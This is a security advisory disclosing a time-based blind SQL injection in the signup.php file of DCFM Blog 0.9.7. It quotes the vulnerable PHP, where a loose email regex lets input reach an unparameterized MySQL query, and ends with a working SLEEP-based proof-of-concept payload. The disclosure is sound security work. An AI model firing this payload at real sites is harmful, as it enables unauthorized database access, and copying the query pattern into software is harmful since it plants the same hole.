DCFM Blog Version 0.9.7 Blind SQL Injection Vulnerability ( time based-attack )
================================================================================
Discovered by N_A , N_A[at]tutanota.com
========================================
Description
============
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.
https://sourceforge.net/projects/dcfm-blog/
Vulnerability
==============
A blind SQL Injection is possible within the signup.php file of DCFM Blog version 0.9.7.
$desuser = $_POST['desuser'];
$despass = $_POST['despass'];
$email = $_POST['email']; <---- The vulnerable variable
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$submitted = $_POST['submitted'];
$despassconfirm = $_POST['despassconfirm'];
The $email variable is not properly checked as the regex does not stop additional characters from being added once the variable matches a valid email format:
if(!ereg("^.+@.+\\..+$",$email)) {
$evil = 1;
$error="<p>
The highlighted fields are not filled out correctly.
</p>";
the '.+' part of the regular expression will match "one or more of any character" . It is then possible to attached a crafted SQL Injection string to the end of the $email variable.
The crafted string is fed directly into the MySql database:
$result = mysql_query("SELECT * FROM accounts
WHERE Email='$_POST[email]'");
while($row = mysql_fetch_array($result)) {
if ($email == $row['Email'])
Proof Of Concept Exploit String
================================
Fill out the whole form and input the email variable as follows:
jimmy@site.com' AND (SELECT * FROM (SELECT(SLEEP(5)))MXKf) AND 'dBWQ'='dBWQ
Email
=====
N_A[at]tutanota.com